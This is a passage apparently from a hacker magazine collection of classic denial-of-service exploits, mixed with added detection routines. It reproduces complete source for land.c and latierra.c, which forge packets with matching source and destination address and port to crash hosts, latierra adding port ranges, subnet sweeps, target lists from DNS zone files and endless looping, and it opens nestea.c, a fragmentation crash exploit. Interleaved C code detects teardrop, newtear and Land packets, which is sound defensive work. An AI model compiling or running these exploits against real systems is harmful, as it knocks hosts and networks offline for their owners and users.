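    uint32_t end;       /* one past the last payload byte */
    int      more;      /* MF flag */
    uint16_t udp_len;   /* UDP length field; 0 unless a first UDP fragment */
};

static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Parse a wire-format IPv4 packet; returns 0 on success, -1 if malformed. */
int parse_frag(const uint8_t *pkt, size_t caplen, struct frag *f)
{
    size_t hlen, tot;
    uint16_t fo;

    if (caplen < 20 || (pkt[0] >> 4) != 4)
        return -1;
    hlen = (size_t)(pkt[0] & 0x0f) * 4;
    tot = be16(pkt + 2);
    if (hlen < 20 || tot < hlen || tot > caplen)
        return -1;
    fo = be16(pkt + 6);
    f->id = be16(pkt + 4);
    f->more = (fo & 0x2000) != 0;
    f->start = (uint32_t)(fo & 0x1fff) * 8;   /* offset field counts 8-byte units */
    f->end = f->start + (uint32_t)(tot - hlen);
    f->udp_len = 0;
    if (pkt[9] == 17 && f->start == 0 && tot - hlen >= 8)
        f->udp_len = be16(pkt + hlen + 4);
    return 0;
}

/*
 * Compare a fragment with the one queued before it.  *left receives the
 * number of new bytes the fragment contributes after the overlap is trimmed,
 * kept signed so a zero or negative result is visible instead of wrapping.
 */
int check_pair(const struct frag *prev, const struct frag *cur, long *left)
{
    int flags = 0;
    uint32_t span = prev->end > cur->end ? prev->end : cur->end;

    *left = (long)cur->end - (long)cur->start;
    if (prev->id != cur->id)
        return 0;                              /* different datagrams */
    if (cur->start < prev->end) {
        flags |= F_OVERLAP;
        *left = (long)cur->end - (long)prev->end;
        if (*left <= 0)
            flags |= F_NO_DATA;                /* drop, never copy */
    }
    if (!cur->more && prev->udp_len > span)
        flags |= F_UDP_LEN;
    return flags;
}

/* Wrapper over two captured packets; -1 if either one is malformed. */
int check_wire(const uint8_t *a, size_t alen, const uint8_t *b, size_t blen,
               long *left)
{
    struct frag fa, fb;

    if (parse_frag(a, alen, &fa) != 0 || parse_frag(b, blen, &fb) != 0)
        return -1;
    return check_pair(&fa, &fb, left);
}

/* Constructed sample headers; bytes not listed are zero. */
#define HDR(tot, fo_hi, fo_lo) 0x45,0,0,(tot), 0,242, (fo_hi),(fo_lo), \
                               64,17,0,0, 192,0,2,1, 192,0,2,2
static const uint8_t td_first[56]  = { HDR(56, 0x20, 0), 4,0, 0,53, 0,36 }; /* PADDING 0x1c */
static const uint8_t nt_first[48]  = { HDR(48, 0x20, 0), 4,0, 0,53, 0,48 }; /* PADDING 0x14, UDP length doubled */
static const uint8_t second[24]    = { HDR(24, 0x00, 3) };  /* offset MAGIC = 3, i.e. byte 24 */
static const uint8_t ok_first[36]  = { HDR(36, 0x20, 0), 4,0, 0,53, 0,24 };
static const uint8_t ok_second[28] = { HDR(28, 0x00, 2) };  /* starts where ok_first ends */

int main(void)
{
    long left;
    int fl;

    fl = check_wire(td_first, sizeof td_first, second, sizeof second, &left);
    printf("teardrop pair: flags=0x%x left=%ld\n", fl, left);
    fl = check_wire(nt_first, sizeof nt_first, second, sizeof second, &left);
    printf("newtear pair:  flags=0x%x left=%ld\n", fl, left);
    fl = check_wire(ok_first, sizeof ok_first, ok_second, sizeof ok_second, &left);
    printf("normal pair:   flags=0x%x left=%ld\n", fl, left);
    return 0;
}
```

A fragment flagged F_NO_DATA contributes nothing and is safe to discard along with its queue. F_UDP_LEN catches the length field that newtear.c inflates even though its second fragment trims to exactly zero.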

 ----- land.c ----- cut ----- cut -----

 /* land.c by m3lt, FLC
    crashes a win95 box */

 #include <stdio.h>
 #include <netdb.h>
 #include <arpa/inet.h>
 #include <netinet/in.h>
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <netinet/ip.h>
 #include <netinet/ip_tcp.h>
 #include <netinet/protocols.h>

 struct pseudohdr
 {
         struct in_addr saddr;
         struct in_addr daddr;
         u_char zero;
         u_char protocol;
         u_short length;
         struct tcphdr tcpheader;
 };

 u_short checksum(u_short * data,u_short length)
 {
         register long value;
         u_short i;

         for(i=0;i<(length>>1);i++)
                 value+=data[i];

         if((length&1)==1)
                 value+=(data[i]<<8);

         value=(value&65535)+(value>>16);

         return(~value);
 }

 int main(int argc,char * * argv)
 {
         struct sockaddr_in sin;
         struct hostent * hoste;
         int sock;
         char buffer[40];
         struct iphdr * ipheader=(struct iphdr *) buffer;
         struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
         struct pseudohdr pseudoheader;

         fprintf(stderr,"land.c by m3lt, FLC\n");

         if(argc<3)
         {
                 fprintf(stderr,"usage: %s IP port\n",argv[0]);
                 return(-1);
         }

         bzero(&sin,sizeof(struct sockaddr_in));
         sin.sin_family=AF_INET;

         if((hoste=gethostbyname(argv[1]))!=NULL)
                 bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
         else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
         {
                 fprintf(stderr,"unknown host %s\n",argv[1]);
                 return(-1);
         }

         if((sin.sin_port=htons(atoi(argv[2])))==0)
         {
                 fprintf(stderr,"unknown port %s\n",argv[2]);
                 return(-1);
         }

         if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
         {
                 fprintf(stderr,"couldn't allocate raw socket\n");
                 return(-1);
         }

         bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
         ipheader->version=4;
         ipheader->ihl=sizeof(struct iphdr)/4;
         ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
         ipheader->id=htons(0xF1C);
         ipheader->ttl=255;
         ipheader->protocol=IP_TCP;
         ipheader->saddr=sin.sin_addr.s_addr;
         ipheader->daddr=sin.sin_addr.s_addr;

         tcpheader->th_sport=sin.sin_port;
         tcpheader->th_dport=sin.sin_port;
         tcpheader->th_seq=htonl(0xF1C);
         tcpheader->th_flags=TH_SYN;
         tcpheader->th_off=sizeof(struct tcphdr)/4;
         tcpheader->th_win=htons(2048);

         bzero(&pseudoheader,12+sizeof(struct tcphdr));
         pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
         pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
         pseudoheader.protocol=6;
         pseudoheader.length=htons(sizeof(struct tcphdr));
         bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
         tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));

         if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
         {
                 fprintf(stderr,"couldn't send packet\n");
                 return(-1);
         }

         fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);

         close(sock);
         return(0);
 }

 ----- cut ----- cut -----
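
A receive-side check for the packet shape land.c builds (one address used as both source and destination, one port used for both ends), as an added example that is not part of the original file; function names are hypothetical and the sample packets are constructed. It keys on the address and port equality rather than on the SYN flag, because latierra.c below makes the flags, window and sequence number configurable.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum land_verdict {
    LAND_PASS = 0,      /* source and destination addresses differ */
    LAND_SRC_EQ_DST,    /* source address == destination address */
    LAND_FULL_MATCH,    /* ...and TCP source port == destination port */
    LAND_MALFORMED      /* truncated or not IPv4 */
};

/* Classify one wire-format IPv4 packet received on a network interface. */
enum land_verdict land_check(const uint8_t *pkt, size_t caplen)
{
    size_t hlen;
    unsigned frag_off;

    if (caplen < 20 || (pkt[0] >> 4) != 4)
        return LAND_MALFORMED;
    hlen = (size_t)(pkt[0] & 0x0f) * 4;        /* honour IP options */
    if (hlen < 20 || hlen > caplen)
        return LAND_MALFORMED;

    if (memcmp(pkt + 12, pkt + 16, 4) != 0)
        return LAND_PASS;

    /* Ports are only present in a TCP packet that is a first fragment. */
    frag_off = ((unsigned)(pkt[6] & 0x1f) << 8) | pkt[7];
    if (pkt[9] != 6 || frag_off != 0 || caplen < hlen + 4)
        return LAND_SRC_EQ_DST;
    return memcmp(pkt + hlen, pkt + hlen + 2, 2) == 0
               ? LAND_FULL_MATCH : LAND_SRC_EQ_DST;
}

/* Constructed samples (192.0.2.0/24, port 139 chosen arbitrarily). */
static const uint8_t land_syn[40] = {          /* field values as set in land.c */
    0x45,0,0,40, 0x0f,0x1c, 0,0, 255,6,0,0, 192,0,2,10, 192,0,2,10,
    0,139, 0,139, 0,0,0x0f,0x1c, 0,0,0,0, 0x50,0x02, 0x08,0x00 };
static const uint8_t land_synpsh[40] = {       /* SYN|PUSH, window 0xFDE8 */
    0x45,0,0,40, 0x0f,0x1c, 0,0, 255,6,0,0, 192,0,2,10, 192,0,2,10,
    0,139, 0,139, 0,0,0x0f,0x1c, 0,0,0,0, 0x50,0x0a, 0xfd,0xe8 };
static const uint8_t land_opts[44] = {         /* same shape behind 4 option bytes */
    0x46,0,0,44, 0x0f,0x1c, 0,0, 255,6,0,0, 192,0,2,10, 192,0,2,10,
    1,1,1,0, 0,80, 0,80, 0,0,0,1, 0,0,0,0, 0x50,0x02, 0x08,0x00 };
static const uint8_t normal_syn[40] = {        /* ordinary connection attempt */
    0x45,0,0,40, 0x12,0x34, 0,0, 64,6,0,0, 192,0,2,20, 192,0,2,10,
    4,1, 0,139, 0,0,0,1, 0,0,0,0, 0x50,0x02, 0x08,0x00 };
static const uint8_t udp_self[28] = {          /* non-TCP, addresses equal */
    0x45,0,0,28, 0x12,0x35, 0,0, 64,17,0,0, 192,0,2,10, 192,0,2,10,
    0,7, 0,7, 0,8 };

int main(void)
{
    printf("land_syn:    %d\n", land_check(land_syn, sizeof land_syn));
    printf("land_synpsh: %d\n", land_check(land_synpsh, sizeof land_synpsh));
    printf("land_opts:   %d\n", land_check(land_opts, sizeof land_opts));
    printf("normal_syn:  %d\n", land_check(normal_syn, sizeof normal_syn));
    printf("udp_self:    %d\n", land_check(udp_self, sizeof udp_self));
    return 0;
}
```

The check is meant for packets arriving from a network interface: traffic on the loopback interface legitimately carries matching addresses and must not be fed to it.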

 ----- latierra.c ----- cut ----- cut -----

 /**************************************************************/
 /*                                                            */
 /*  La Tierra v1.0b  - by MondoMan (KeG), elmondo@usa.net     */
 /*                                                            */
 /*  Modified version of land.c by m3lt, FLC                   */
 /*                                                            */
 /*  Compiled on RedHat Linux 2.0.27, Intel Pentium 200Mhz     */
 /*  gcc version 2.7.2.1       tabs set to 3                   */
 /*                                                            */
 /*  gcc latierra.c -o latierra                                */
 /*                                                            */
 /*  Refer to readme.txt for more details and history          */
 /*                                                            */
 /**************************************************************/
 #include <stdio.h>
 #include <getopt.h>
 #include <string.h>
 #include <netdb.h>
 #include <arpa/inet.h>
 #include <netinet/in.h>
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <netinet/ip.h>
 #include <netinet/ip_tcp.h>
 #include <netinet/protocols.h>
 #define DEFAULT_FREQUENCY  1
 #define TRUE       1
 #define FALSE        0
 #define FOR_EVER      -5
 #define LIST_FILE      1
 #define ZONE_FILE      2
 #define MAXLINELENGTH    512
 #define DEFAULT_SEQ    0xF1C
 #define DEFAULT_TTL           0xFF
 #define DEFAULT_TCPFLAGS      (TH_SYN | TH_PUSH)
 #define DEFAULT_WINSIZE       0xFDE8
 struct pseudohdr
  {
    struct in_addr saddr;
    struct in_addr daddr;
    u_char zero;
    u_char protocol;
    u_short length;
    struct tcphdr tcpheader;
  };
 typedef struct latierra_data
  {
  char dest_ip[256];
  int  tcp_flags;
  int  window_size;
  int  ip_protocol;
  int  sequence_number;
  int  ttl;
  int  supress_output;
         int  message_type;
  } LATIERRA_DATA;
 void alternatives(void);
 int  get_ip(int use_file, FILE *fp, char *buff);
 int  land(LATIERRA_DATA *ld, int port_number);
 void nslookup_help(void);
 void print_arguments(void);
 void protocol_list(void);
 /********/
 /* main */
 /********/
 int main(int argc, char **argv)
 {
  FILE *fp;
  LATIERRA_DATA ld;
  int frequency = DEFAULT_FREQUENCY, x;
  int beginning_port=1, octet=1, scan_loop=0, loop_val=0, use_file=FALSE;
  int ending_port = 0, loop = TRUE, i = 0, increment_addr = FALSE;
    char got_ip = FALSE, got_beg_port = FALSE;
  char class_c_addr[21], filename[256], buff[512], valid_tcp_flags[16];
  printf("\nlatierra v1.0b by MondoMan (elmondo@usa.net), KeG\n");
    printf("Enhanced version of land.c originally developed by m3lt, FLC\n");
  strcpy(valid_tcp_flags, "fsrpau");
  ld.tcp_flags = 0;
  ld.window_size = DEFAULT_WINSIZE;
  ld.ip_protocol = IP_TCP;
  ld.sequence_number = DEFAULT_SEQ;
  ld.ttl = DEFAULT_TTL;
  ld.message_type = 0;

  if(argc > 1 && (!strcmp(argv[1], "-a")))
   alternatives();
  if(argc > 1 && (!strcmp(argv[1], "-n")))
   nslookup_help();
  if(argc > 1 && (!strcmp(argv[1], "-p")))
   protocol_list();
  if(argc == 1 || ( (argc >= 2) && (!strcmp(argv[1], "-h"))))
   print_arguments();
  while((i = getopt(argc, argv, "i:b:e:s:l:o:t:w:p:q:v:m:")) != EOF)
   {
   switch(i)
    {
    case 't':
     for(x=0;x<strlen(optarg);x++)
      switch(optarg[x])
       {
       case 'f':                        /* fin */
        ld.tcp_flags |= TH_FIN;
        break;
       case 's':                        /* syn */
        ld.tcp_flags |= TH_SYN;
        break;
       case 'r':                        /* reset */
        ld.tcp_flags |= TH_RST;
        break;
       case 'p':                        /* push */
        ld.tcp_flags |= TH_PUSH;
        break;
       case 'a':                        /* ack */
        ld.tcp_flags |= TH_ACK;
        break;
       case 'u':                        /* urgent */
        ld.tcp_flags |= TH_URG;
        break;
       default:
        printf("\nERROR: Invalid option specified [ %c ] for tcp_flags.\n\n", optarg[x]);
        return(-12);
        break;
       }
     break;
    case 'q':
     ld.sequence_number = atoi(optarg);
     break;
    case 'w':
     ld.window_size = atoi(optarg);
     break;
    case 'm':
     ld.message_type = atoi(optarg);
     break;
    case 'v':
     ld.ttl = atoi(optarg);
     break;
    case 'p':
     ld.ip_protocol = atoi(optarg);
     break;
    case 'o':
     ld.supress_output = TRUE;
     break;
    case 'i':
     if(strlen(optarg) > 1)
      strcpy(ld.dest_ip, optarg);
     else
      {
      printf("ERROR: Must specify valid IP or hostname.\n");
      return(-6);
      }
     got_ip = TRUE;
     break;
    case 's':
     frequency = atoi(optarg);
     break;
    case 'l':
     loop = atoi(optarg);
     break;
    case 'b':
     beginning_port = atoi(optarg);
     got_beg_port = TRUE;
     break;
    case 'e':
     ending_port = atoi(optarg);
     break;
    }
   }
  if(!ld.tcp_flags)
   ld.tcp_flags = DEFAULT_TCPFLAGS;
  if(!got_beg_port)
   {
   fprintf(stderr, "\nMust specify beginning port number.  Use -h for help with arguments.\n\n");
   return(-7);
   }
  if(ending_port == 0)
   ending_port = beginning_port;
  printf("\nSettings:\n\n");
    printf("  (-i)   Dest. IP Addr   : ");
  if(ld.dest_ip[strlen(ld.dest_ip) -1] == '-')
   {
   ld.dest_ip[strlen(ld.dest_ip)-1] = 0x0;
   strcpy(class_c_addr, ld.dest_ip);
   strcat(ld.dest_ip, "1");
   printf(" %s (Class C range specified).\n", ld.dest_ip);
   increment_addr = TRUE;
   octet = 1;
   }
  else
   if(strlen(ld.dest_ip) > 5)
    {
    if(strncmp(ld.dest_ip, "zone=", 5)==0)
     {
     strcpy(filename, &ld.dest_ip[5]);
     printf("%s (using DNS zone file)\n", filename);
     use_file = ZONE_FILE;
     }
    else if(strncmp(ld.dest_ip, "list=", 5) == 0)
     {
     strcpy(filename, &ld.dest_ip[5]);
     printf("%s (using ASCII list)\n", filename);
     use_file = LIST_FILE;
     }
    else
     printf("%s\n", ld.dest_ip);
    }
   else
    {
    printf("Destination specifier (%s) length must be > 7.\n", ld.dest_ip);
    return(-9);
    }
  printf("  (-b)   Beginning Port #: %d\n",     beginning_port );
  printf("  (-e)   Ending Port #   : %d\n",     ending_port );
  printf("  (-s)   Seconds to Pause: %d\n",     frequency );
  printf("  (-l)   Loop            : %d %s\n",  loop, (loop == FOR_EVER) ? "(forever)" : " " );
  printf("  (-w)   Window size     : %d\n",     ld.window_size );
  printf("  (-q)   Sequence Number : %X (%d)\n",ld.sequence_number, ld.sequence_number );
  printf("  (-v)   Time-to-Live    : %d\n",     ld.ttl);
  printf("  (-p)   IP Protocol #   : %d\n",     ld.ip_protocol );
  printf("  (-t)   TCP flags       : ");
  strcpy(buff, "");
  if( ld.tcp_flags & TH_FIN)
   strcat(buff, "fin ");
  if( ld.tcp_flags & TH_SYN)
   strcat(buff, "syn ");
  if(ld.tcp_flags & TH_RST)
   strcat(buff, "rst ");
  if(ld.tcp_flags & TH_PUSH)
   strcat(buff, "push ");
  if(ld.tcp_flags & TH_ACK)
   strcat(buff, "ack ");
  if(ld.tcp_flags & TH_URG)
   strcat(buff, "urg ");
  printf("%s\n\n", buff);

  if(ending_port < beginning_port)
   {
   printf("\nERROR: Ending port # must be greater than beginning port #\n\n");
   return(-8);
   }

  scan_loop = loop_val = loop;

  if(use_file)
   {
   if(access(filename, 0))
    {
    printf("\nERROR: The file you specified (%s) cannot be found.\n\n", filename);
    return(-9);
    }
   if( (fp = fopen(filename, "rt")) == NULL)
    {
    printf("ERROR: Unable to open %s.\n", filename);
    return(-10);
    }
   if(!get_ip(use_file, fp, buff))
    {
    printf("Unable to get any IP address from file %s.\n", filename);
    return(-11);
    }
   strcpy(ld.dest_ip, buff);
   }

  while( (loop == FOR_EVER) ? 1 : loop-- > 0)
   {
   for(i=beginning_port; i <= ending_port; i++)
    {
    if(land(&ld, i))        /* go for it BaBy! */
     break;
    if(frequency)          /* make sure freq > 0 */
     {
     if(!ld.supress_output)
      printf("-> paused %d seconds.\n", frequency);
     sleep(frequency);
     }
    }
   if( (!use_file) && (loop && increment_addr) )
    {
    char temp_addr[21];
    if(++octet > 254)                        /* check for reset */
     {
     if(loop_val != FOR_EVER)              /* make sure not to distrute forever! */
      {
      if(++scan_loop > loop_val)        /* check if scanned x times */
       break;
      else
       loop = loop_val;                /* restore original value */
      }
     octet = 1;                           /* reset */
     }
    sprintf(temp_addr, "%s%d", class_c_addr, octet);
    strcpy(ld.dest_ip, temp_addr);

    if(!ld.supress_output)
     printf("** incrementing to next IP address: %s\n", ld.dest_ip);
    if(scan_loop > loop_val)
     break; /* break while loop */
    }
   else if(use_file)
    {
    if(!get_ip(use_file, fp, buff))
     break;

    loop++;
    strcpy(ld.dest_ip, buff);
    }
   } /* end while */
  printf("\nDone.\n\n");
 } /* end main */
 int  get_ip(int use_file, FILE *fp, char *buff)
 {
  if(use_file == LIST_FILE)
   return(get_ip_from_list(fp, buff));

  return(get_ip_from_zone(fp, buff));
 }
 int get_ip_from_list(FILE *fp, char *buff)
 {
  int ret_val;
  while(1)
   {
   ret_val = (int)fgets(buff, MAXLINELENGTH, fp);
   if((ret_val == EOF) || (ret_val == (int)NULL))
    return 0;
   if( strlen(buff) >= 7)
    if((buff[0] != ';') && (buff[0] != '['))
     {
     if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') )
      buff[strlen(buff)-1] = 0x0;
     return 1;
     }
   }
  return 0;
 }
 int get_ip_from_zone(FILE *fp, char *buff)
 {
  int ret_val, i;
  char *p, delim[8];
  strcpy(delim, " \t");
  while(1)
   {
   ret_val = (int)fgets(buff, MAXLINELENGTH, fp);
   if((ret_val == EOF) || (ret_val == (int)NULL))
    return 0;
   if( strlen(buff) >= 7)
    if((buff[0] != ';') && (buff[0] != '[') && (strncmp(buff, "ls -d", 5) != 0))
     {
     if( (p = strtok( buff, delim)) == NULL)
      continue;
     if( (p = strtok(NULL, delim)) == NULL)
      continue;
     if(strcmp(p, "A"))   /* be sure second column is a DNS A record */
      continue;

     if( (p = strtok(NULL, delim)) == NULL)
      continue;
     strcpy(buff, p);
     /* verify that we have a valid IP address to work with */
     if(inet_addr(p) == -1)
      continue;
     /* strip off trailing line characters */

     if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') )
      buff[strlen(buff)-1] = 0x0;
     return 1;
     }
   }
  return 0;
 }
 /************/
 /* checksum */
 /************/
 u_short checksum(u_short * data,u_short length)
 {
  register long value;
  u_short i;
  for(i = 0; i< (length >> 1); i++)
   value += data[i];
  if((length & 1)==1)
   value += (data[i] << 8);
  value = (value & 0xFFFF) + (value >> 16);
  return(~value);
 }
 /********/
 /* land */
 /********/
 int land(LATIERRA_DATA *ld,  int port_number)
 {
  struct sockaddr_in sin;
    int sock;
    char buffer[40];
    struct iphdr * ipheader = (struct iphdr *) buffer;
    struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
    struct pseudohdr pseudoheader;
  bzero(&sin,sizeof(struct sockaddr_in));
    sin.sin_family=AF_INET;
    if((sin.sin_addr.s_addr=inet_addr(ld->dest_ip))==-1)
     {
       printf("ERROR: unknown host %s\n", ld->dest_ip);
       return(-1);
       }
  if((sin.sin_port=htons(port_number))==0)
     {
       printf("ERROR: unknown port %d\n",port_number);
       return(-2);
       }
  if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
     {
       printf("ERROR: couldn't allocate raw socket\n");
       return(-3);
       }
  bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
    ipheader->version=4;
    ipheader->ihl=sizeof(struct iphdr)/4;
    ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
    ipheader->id=htons(ld->sequence_number);
    ipheader->ttl = ld->ttl;
    ipheader->protocol = ld->ip_protocol;
    ipheader->saddr=sin.sin_addr.s_addr;
    ipheader->daddr=sin.sin_addr.s_addr;
    tcpheader->th_sport = sin.sin_port;
    tcpheader->th_dport = sin.sin_port;
    tcpheader->th_seq = htonl(ld->sequence_number);
    tcpheader->th_flags = ld->tcp_flags;
    tcpheader->th_off = sizeof(struct tcphdr)/4;
    tcpheader->th_win = htons(ld->window_size);
    bzero(&pseudoheader,12+sizeof(struct tcphdr));
    pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
    pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
    pseudoheader.protocol = ld->ip_protocol;
    pseudoheader.length = htons(sizeof(struct tcphdr));
    bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
    tcpheader->th_sum = checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
    if( sendto(sock,  buffer,
        sizeof(struct iphdr)+sizeof(struct tcphdr),
        ld->message_type,
        (struct sockaddr *) &sin,
        sizeof(struct sockaddr_in) )==-1)
     {
       printf("ERROR: can't send packet. (sendto failed)\n");
       return(-4);
       }
  if(!ld->supress_output)
   printf("-> packet successfully sent to: %s:%d\n", ld->dest_ip, port_number);
    close(sock);
    return(0);
 }
 /* End of land */
 void alternatives()
 {
  printf("\nAlternative command line arguments for option -i\n\n");
  printf("    You can create two types of files that latierra can use to get\n");
  printf("    a list of IP addresses, a simple ASCII file with each IP address\n");
  printf("    appearing on each line or better yet, a DNS zone file created by\n");
  printf("    nslookup.  If you are unfamiliar with nslookup, specify a '-n' on the\n");
  printf("    command line of latierra.\n\n");
  printf("    Basically, latierra will walk down the list and send the spoofed packet\n");
  printf("    to each IP address.  Once the list is complete, and loop > 1, the list\n");
   printf("    is repeated.   To specify that the '-i' option should use a zone file,\n");
  printf("    specify \"zone=filename.txt\" instead of an IP address.  To specify a \n");
  printf("    simple ASCII list of IP addresses, use \"list=filename.txt\".  Lines\n");
  printf("    beginning with ';' or '[' are ignored.  Lines that are not an 'A' \n");
  printf("    record (second column) in a zone file will be ignored.\n\n");
  exit(-1);
 }
 void nslookup_help()
 {
  printf("\nNSLOOKUP help\n\n");

  printf("To see who is the DNS server for a particular domain, issue the following:\n");
  printf("        > set type=ns\n");
  printf("        > xyz.com\n\n");
  printf("  You will see a list of the name server(s) if completed successfully\n\n");
  printf("To get a list of all the DNS entries for a particular domain, run nslookup\n");
  printf("and issue the following commands:\n");
  printf("         > server 1.1.1.1\n");
  printf("         > ls -d xyz.com > filename.txt\n\n");
  printf("Line 1 sets the server that nslookup will use to resolve a name.\n");
  printf("Line 2 requires all the information about xyz.com be written to filename.txt\n\n");
  exit(-1);
 }
 void protocol_list()
 {
  printf("\nProtocol List:\n\n");
  printf("Verified:\n");
  printf("1-ICMP   2-IGMP   3-GGP  5-ST   6-TCP   7-UCL   8-EGP   9-IGP  10-BBN_RCC_MON\n");
  printf("11-NVP11   13-ARGUS   14-EMCON   15-XNET   16-CHAOS   17-UDP   18-MUX\n");
  printf("19-DCN_MEAS   20-HMP   21-PRM   22-XNS_IDP   23-TRUNK1   24-TRUNK2\n");
  printf("25-LEAF1   26-LEAF2    27-RDP   28-IRTP      29-ISO_TP4  30-NETBLT\n");
  printf("31-MFE_NSP   32-MERIT_INP   33-SEP   34-3PC   62-CFTP    64-SAT_EXPAK\n");
  printf("66-RVD       67-IPPC        69-SAT_MON   70-VISA         71-IPCV\n");
  printf("76-BR_SAT_MON   77-SUN_ND   78-WB_MON   79-WB_EXPAK   80-ISO_IP\n");
  printf("81-VMTP   82-SECURE_VMTP   83-VINES  84-TTP   85-NSFNET_IGP   86-DGP\n");
  printf("87-TCF    88-IGRP          89-OSPFIGP         90-SPRITE_RPG   91-LARP\n\n");
  printf("Supported:\n");
  printf("    6-TCP     17-UDP    (future: PPTP, SKIP) \n\n");
  exit(-1);
 }
 void print_arguments()
 {
  printf("Arguments: \n");
  printf("     *   -i dest_ip = destination ip address such as 1.1.1.1\n");
  printf("                If last octet is '-', then the address will increment\n");
  printf("                from 1 to 254 (Class C) on the next loop\n");
  printf("                and loop must be > 1 or %d (forever).\n", FOR_EVER);
  printf("                Alternatives = zone=filename.txt or list=filename.txt (ASCII)\n");
  printf("                For list of alternative options, use  -a instead of -h.\n");
  printf("     *   -b port# = beginning port number (required).\n");
  printf("         -e port# = ending port number (optional)\n");
  printf("         -t = tcp flag options (f=fin,~s=syn,r=reset,~p=push,a=ack,u=urgent)\n");
  printf("         -v = time_to_live value, default=%d\n", DEFAULT_TTL);
  printf("         -p protocol = ~6=tcp, 17=udp, use -p option for complete list\n");
  printf("         -w window_size = value from 0 to ?, default=%d\n", DEFAULT_WINSIZE);
  printf("         -q tcp_sequence_number, default=%d\n", DEFAULT_SEQ);
  printf("         -m message_type (~0=none,1=Out-Of-Band,4=Msg_DontRoute\n");
  printf("         -s seconds = delay between port numbers, default=%d\n", DEFAULT_FREQUENCY);
  printf("         -o 1 = suppress additional output to screen, default=0\n" );
  printf("         -l loop = times to loop through ports/scan, default=%d, %d=forever\n", 1, FOR_EVER);
  printf("     * = required     ~ = default parameter values\n\n");
  exit(-1);
 }

 ----- cut ----- cut -----
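
 The packets built by land() above carry the same value in the source and
 destination address and in the source and destination port. The following
 detection routine is an added example, not part of latierra.c or of this
 magazine; classify_land, make_sample and the 192.0.2.x sample addresses are
 hypothetical names and constructed data.

```c
/* Added example: classify IPv4 packets that match the Land pattern.
 * All names are hypothetical; the sample packets are constructed. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum land_verdict {
    PKT_MALFORMED      = -1, /* too short or not IPv4 */
    PKT_OK             = 0,
    PKT_LAND_ADDR      = 1,  /* source address == destination address */
    PKT_LAND_ADDR_PORT = 2   /* ...and source port == destination port */
};

static uint16_t be16(const uint8_t *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

/* pkt points at the IPv4 header of a packet received on a non-loopback
 * interface (on loopback, equal addresses are normal traffic). */
int classify_land(const uint8_t *pkt, size_t len)
{
    size_t ihl;

    if (len < 20 || (pkt[0] >> 4) != 4)
        return PKT_MALFORMED;
    ihl = (size_t)(pkt[0] & 0x0f) * 4;
    if (ihl < 20 || ihl > len)
        return PKT_MALFORMED;

    if (memcmp(pkt + 12, pkt + 16, 4) != 0)   /* saddr vs daddr */
        return PKT_OK;

    /* Ports are only present in the first fragment of TCP (6) / UDP (17). */
    if ((pkt[9] == 6 || pkt[9] == 17) &&
        (be16(pkt + 6) & 0x1fff) == 0 &&
        len >= ihl + 4 &&
        be16(pkt + ihl) == be16(pkt + ihl + 2))
        return PKT_LAND_ADDR_PORT;

    return PKT_LAND_ADDR;
}

/* Fill buf with a constructed 20-byte IPv4 header followed by a 20-byte
 * TCP header. Checksums are left zero: the classifier does not read them. */
void make_sample(uint8_t buf[40], const uint8_t src[4], const uint8_t dst[4],
                 uint16_t sport, uint16_t dport)
{
    memset(buf, 0, 40);
    buf[0] = 0x45;                       /* version 4, ihl 5 */
    buf[3] = 40;                         /* total length */
    buf[8] = 64;                         /* ttl */
    buf[9] = 6;                          /* protocol: TCP */
    memcpy(buf + 12, src, 4);
    memcpy(buf + 16, dst, 4);
    buf[20] = (uint8_t)(sport >> 8);
    buf[21] = (uint8_t)(sport & 0xff);
    buf[22] = (uint8_t)(dport >> 8);
    buf[23] = (uint8_t)(dport & 0xff);
    buf[32] = 0x50;                      /* TCP data offset 5 */
    buf[33] = 0x02;                      /* SYN */
}

int main(void)
{
    const uint8_t a[4] = {192, 0, 2, 10}, b[4] = {192, 0, 2, 20};
    uint8_t pkt[40];

    make_sample(pkt, a, a, 139, 139);
    printf("same addr, same port : %d\n", classify_land(pkt, sizeof pkt));
    make_sample(pkt, a, a, 1025, 139);
    printf("same addr, diff port : %d\n", classify_land(pkt, sizeof pkt));
    make_sample(pkt, b, a, 139, 139);
    printf("diff addr            : %d\n", classify_land(pkt, sizeof pkt));
    return 0;
}
```

 A border filter that drops inbound packets whose source address belongs to
 the protected network removes this traffic before any host has to parse it.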

 ----- nestea.c ----- cut ----- cut -----

 // nestea.c by humble of rhino9 4/16/98
 // This exploits the "off by one ip header" bug in the linux ip frag code.
 // Crashes linux 2.0.* and 2.1.*  and some windows boxes
 // this code is a total rip of teardrop - it's messy
 // hi sygma

 #include <stdio.h>
 #include <stdlib.h>
 #include <unistd.h>
 #include <string.h>
